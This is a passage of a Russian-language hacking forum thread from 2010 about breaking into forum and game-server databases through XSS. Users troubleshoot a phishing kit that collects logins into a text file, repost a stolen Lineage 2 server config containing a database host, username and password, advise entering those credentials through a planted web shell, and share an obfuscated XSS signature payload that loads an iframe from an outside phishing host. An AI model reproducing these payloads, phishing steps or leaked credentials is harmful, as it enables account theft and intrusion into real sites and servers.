Взлом БД через форум с xss - Базы серверов и брут - Все, что связано с брутом и работой с базами данных
10.06.2010, 06:35
#76
Рыцарь
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Re: Взлом БД через форум с xss
10.06.2010, 12:38
#77
Разведчик
Регистрация: 22.05.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: Взлом БД через форум с xss
Дорогой "Монк" у меня вопрос !!!
Итак в проге всё прописываю получаю Index.html и ещё 2 файла login.php 1.txt после этого заливаю на сайт а в сайте какие-та не понятные ироглифы на компе открывается норм index.html а на моём сайте это фигня !!!Пожалуйста объясни мне как убрать ошибку ...
________________
Помог ?Жми спосибку ) !
{ADM}{Number0ne}
10.06.2010, 12:55
#78
Рыцарь
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Re: Взлом БД через форум с xss
Открываешь index.htm блокнотом, выбираешь файл --> сохранить как , выбираешь кодировку (ANSI, UTF-8, Юникод, пробуй разные я точно не помню) где имя файла пишешь index.htm и сохраняешь
10.06.2010, 14:00
#79
Разведчик
Регистрация: 10.05.2010
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: Взлом БД через форум с xss
5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
всё зделал тыкаю сылку "здесь" вылазит , IP менял
Вы были заблокированы по следующей причине:
Причина не указана.
Дата снятия блокировки: Никогда
Последний раз редактировалось MrXF; 10.06.2010 в 15:00 .
10.06.2010, 17:58
#80
Капитан
Регистрация: 08.04.2010
Сообщений: 279
Популярность: 654
Сказал(а) спасибо: 126
Поблагодарили 277 раз(а) в 113 сообщениях
Re: Взлом БД через форум с xss
Бери другой хостинг просто h1.ru
11.06.2010, 15:21
#81
Разведчик
Регистрация: 09.06.2010
Сообщений: 7
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: Взлом БД через форум с xss
Последний раз редактировалось Me$$iah; 11.06.2010 в 18:51 .
11.06.2010, 19:38
#82
Капитан
Регистрация: 09.12.2009
Сообщений: 256
Популярность: 20088
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 181
Поблагодарили 681 раз(а) в 251 сообщениях
Re: Взлом БД через форум с xss
Зашел не в ту базу,конфиги смотри в config_game_l2db.php
(названия точно не помню)
11.06.2010, 23:28
#83
Разведчик
Регистрация: 09.06.2010
Сообщений: 7
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: Взлом БД через форум с xss
В config_l2db_game.php <?php
/**
* STRESS WEB
* @author Alexandr Yuschenko (S.T.R.E.S.S.)
* @copyright 2008 - 2009 STRESS WEB
* @version 8.0
* @web [Ссылки могут видеть только зарегистрированные пользователи. ]
*/
if (!defined("STRESSWEB")) die ("Hacking!!!");
$l2db["gameserver"]["0"]["on"] = 1;
$l2db["gameserver"]["0"]["version"] = 4;
$l2db["gameserver"]["0"]["title"] = "Crystal";
$l2db["gameserver"]["0"]["server"]["host"] = "77.246.106.***";
$l2db["gameserver"]["0"]["server"]["port"] = 7777;
$l2db["gameserver"]["0"]["rates"]["exp"] = 777;
$l2db["gameserver"]["0"]["rates"]["sp"] = 777;
$l2db["gameserver"]["0"]["rates"]["adena"] = 777;
$l2db["gameserver"]["0"]["rates"]["items"] = 777;
$l2db["gameserver"]["0"]["rates"]["spoil"] = 777;
$l2db["gameserver"]["0"]["rates"]["quest"] = 777;
$l2db["gameserver"]["0"]["db"]["host"] = "77.246.106.***";
$l2db["gameserver"]["0"]["db"]["user"] = "site";
$l2db["gameserver"]["0"]["db"]["pass"] = "vq035q121294";
$l2db["gameserver"]["0"]["db"]["dbname"] = "777";
$l2db["gameserver"]["0"]["stat"]["enable"] = 1;
$l2db["gameserver"]["0"]["stat"]["count"] = 10;
$l2db["gameserver"]["0"]["stat"]["general"] = 1;
$l2db["gameserver"]["0"]["stat"]["online"] = 1;
$l2db["gameserver"]["0"]["stat"]["top"] = 0;
$l2db["gameserver"]["0"]["stat"]["pvp"] = 1;
$l2db["gameserver"]["0"]["stat"]["pk"] = 1;
$l2db["gameserver"]["0"]["stat"]["castles"] = 1;
$l2db["gameserver"]["0"]["stat"]["clan"] = 1;
$l2db["gameserver"]["0"]["stat"]["epic"] = 1;
$l2db["gameserver"]["0"]["stat"]["raid"] = 1;
$l2db["gameserver"]["0"]["stat"]["clanview"] = 1;
$l2db["gameserver"]["0"]["stat"]["olympiad"] = 1;
$l2db["gameserver"]["0"]["teleport"]["allow"] = 1;
$l2db["gameserver"]["0"]["teleport"]["time"] = 10;
$l2db["gameserver"]["0"]["online"]["enable"] = 1;
$l2db["gameserver"]["0"]["online"]["percent"] = 145;
$l2db["gameserver"]["0"]["telnet"]["port"] = 9999;
$l2db["gameserver"]["0"]["telnet"]["pass"] = "";
$l2db["gameserver"]["0"]["telnet"]["gmname"] = "";
$l2db["gameserver"]["0"]["telnet"]["timeout"] = 2;
$l2db["gameserver"]["1"]["on"] = 1;
$l2db["gameserver"]["1"]["version"] = 4;
$l2db["gameserver"]["1"]["title"] = "Extra";
$l2db["gameserver"]["1"]["server"]["host"] = "77.246.106.***";
$l2db["gameserver"]["1"]["server"]["port"] = 7778;
$l2db["gameserver"]["1"]["rates"]["exp"] = 10;
$l2db["gameserver"]["1"]["rates"]["sp"] = 10;
$l2db["gameserver"]["1"]["rates"]["adena"] = 20;
$l2db["gameserver"]["1"]["rates"]["items"] = 10;
$l2db["gameserver"]["1"]["rates"]["spoil"] = 10;
$l2db["gameserver"]["1"]["rates"]["quest"] = 10;
$l2db["gameserver"]["1"]["db"]["host"] = "77.246.106.***";
$l2db["gameserver"]["1"]["db"]["user"] = "site";
$l2db["gameserver"]["1"]["db"]["pass"] = "vq035q121294";
$l2db["gameserver"]["1"]["db"]["dbname"] = "l2open_db";
$l2db["gameserver"]["1"]["stat"]["enable"] = 1;
$l2db["gameserver"]["1"]["stat"]["count"] = 10;
$l2db["gameserver"]["1"]["stat"]["general"] = 1;
$l2db["gameserver"]["1"]["stat"]["online"] = 1;
$l2db["gameserver"]["1"]["stat"]["top"] = 1;
$l2db["gameserver"]["1"]["stat"]["pvp"] = 1;
$l2db["gameserver"]["1"]["stat"]["pk"] = 1;
$l2db["gameserver"]["1"]["stat"]["castles"] = 1;
$l2db["gameserver"]["1"]["stat"]["clan"] = 1;
$l2db["gameserver"]["1"]["stat"]["epic"] = 1;
$l2db["gameserver"]["1"]["stat"]["raid"] = 1;
$l2db["gameserver"]["1"]["stat"]["clanview"] = 1;
$l2db["gameserver"]["1"]["stat"]["olympiad"] = 1;
$l2db["gameserver"]["1"]["teleport"]["allow"] = 1;
$l2db["gameserver"]["1"]["teleport"]["time"] = 60;
$l2db["gameserver"]["1"]["online"]["enable"] = 1;
$l2db["gameserver"]["1"]["online"]["percent"] = 140;
$l2db["gameserver"]["1"]["telnet"]["port"] = 12345;
$l2db["gameserver"]["1"]["telnet"]["pass"] = "";
$l2db["gameserver"]["1"]["telnet"]["gmname"] = "";
$l2db["gameserver"]["1"]["telnet"]["timeout"] = 2;
?>
есть упоминане про какую-то l2open_db.
Но в разделе SQL есть только две базы:
1) La2**** Tables: dle_admin_sections
dle_banned
dle_banners
dle_category
dle_comments
dle_email
dle_files
dle_flood
dle_images
dle_logs
dle_lostdb
dle_notice
dle_pm
dle_poll
dle_poll_log
dle_post
dle_post_log
dle_rss
dle_rssinform
dle_static
dle_static_files
dle_subscribe
dle_tags
dle_usergroups
dle_users
dle_views
dle_vote
dle_vote_result
stress_admin
stress_news
stress_poll
stress_poll_logs
stress_static
stress_users_tmp
2) information_schema Tables: CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Это говорит о том, что сама гейм база находиться на компе у админа? Если да, то каим образом получить её?
Последний раз редактировалось Me$$iah; 12.06.2010 в 00:10 .
11.06.2010, 23:33
#84
Пехотинец
Регистрация: 19.03.2010
Сообщений: 76
Популярность: 156
Сказал(а) спасибо: 18
Поблагодарили 135 раз(а) в 53 сообщениях
Re: Взлом БД через форум с xss
$l2db["gameserver"]["1"]["db"]["host"] = "77.246.106.***";
$l2db["gameserver"]["1"]["db"]["user"] = "site";
$l2db["gameserver"]["1"]["db"]["pass"] = "vq121294";
$l2db["gameserver"]["1"]["db"]["dbname"] = "l2open_db";
нажимаешь в шеле sql и вводишь эти данные
________________
6 9 8 -1- 8 9 6
При себе иметь 10+ сообщений. пишем сразу по делу
Раздаю свой парсер для slil.ru
тут
Последний раз редактировалось Helko; 12.06.2010 в 13:15 .
12.06.2010, 13:11
#85
Разведчик
Регистрация: 10.06.2010
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: Взлом БД через форум с xss
В подпись вставил------> [acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3C******\x20src=httr://forum.thmega.freehostia.com\x20frameborder=0\x20wi dth=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]
и прказывает----> '> и на фейк не кидает.Что не так?
________________
12345
12.06.2010, 14:11
#86
Рыцарь
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Re: Взлом БД через форум с xss
1) либо куки чисть
2) либо забей и отправляй админу
3) либо если хочешь проверить качай браузер opera 9 и т.п.
13.06.2010, 13:30
#87
Разведчик
Регистрация: 08.06.2010
Сообщений: 3
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: Взлом БД через форум с xss
не пойму.надо заливать 3 файла на хостинг или 1 или архивом?и куда ссылку на них кидать?
13.06.2010, 13:37
#88
Разведчик
Регистрация: 31.05.2010
Сообщений: 5
Популярность: 34
Сказал(а) спасибо: 0
Поблагодарили 12 раз(а) в 5 сообщениях
Re: Взлом БД через форум с xss
если даже не знаешь как и куда заливать - забудь лучше вообще.
Заливать 3 файла, переход на главную страницу [xxx.ru/ ; xxx.ru/index.php]
13.06.2010, 13:39
#89
Разведчик
Регистрация: 08.06.2010
Сообщений: 3
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: Взлом БД через форум с xss
все равно не понял.если можно поподробней.вот есть 3 файла.залил по 1ому на хостинг,дальше что делать?
13.06.2010, 13:54
#90
Старший сержант
Регистрация: 15.08.2009
Сообщений: 218
Популярность: 1020
Сказал(а) спасибо: 196
Поблагодарили 140 раз(а) в 84 сообщениях
Re: Взлом БД через форум с xss
Цитата:
все равно не понял.если можно поподробней.вот есть 3 файла.залил по 1ому на хостинг,дальше что делать?
Читать первый пост.
________________
Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
Заявление об ответственности / Список мошенников
Часовой пояс GMT +4, время: 21:51 .